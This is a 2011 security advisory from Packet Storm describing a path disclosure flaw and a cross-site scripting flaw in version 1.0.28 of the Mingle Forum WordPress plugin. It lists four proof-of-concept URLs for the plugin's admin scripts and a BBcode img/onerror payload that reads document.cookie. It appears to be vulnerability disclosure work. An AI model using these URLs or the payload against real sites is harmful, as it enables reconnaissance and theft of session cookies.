Mingle Forum WordPress Plugin 1.0.28 Cross Site Scripting / Path Disclosure

2011-03-01T00:00:00
ID PACKETSTORM:98809
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2011-03-01T00:00:00

Description

                                        
                                            `==================================  
Vulnerability ID: HTB22849  
Reference: http://www.htbridge.ch/advisory/path_disclosure_in_mingle_forum_wordpress_plugin.html  
Product: Mingle Forum wordpress plugin  
Vendor: Cartpauj ( http://cartpauj.com/ )   
Vulnerable Version: 1.0.28  
Vendor Notification: 15 February 2011   
Vulnerability Type: Path disclosure   
Risk level: Low   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/wp-content/plugins/mingle-forum/fs-admin/wpf-*.php" scripts, it's possible to generate an error that will reveal the full path of the script.  
A remote user can determine the full path to the web root directory and other potentially sensitive information.  
  
The following PoC is available:  
  
  
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-usergroup-edit.php  
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-add-group.php  
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-add-forum.php  
http://[host]/wp-content/plugins/mingle-forum/fs-admin/wpf-moderator.php  
  
  
==================================  
Vulnerability ID: HTB22848  
Reference: http://www.htbridge.ch/advisory/xss_in_mingle_forum_wordpress_plugin.html  
Product: Mingle Forum wordpress plugin  
Vendor: Cartpauj ( http://cartpauj.com/ )   
Vulnerable Version: 1.0.28  
Vendor Notification: 15 February 2011   
Vulnerability Type: XSS (Cross Site Scripting)  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
The following PoC BBcode is available:  
  
  
[img][url]onerror=javascript:alert(document.cookie);"'[/url][/img]  
  
  
`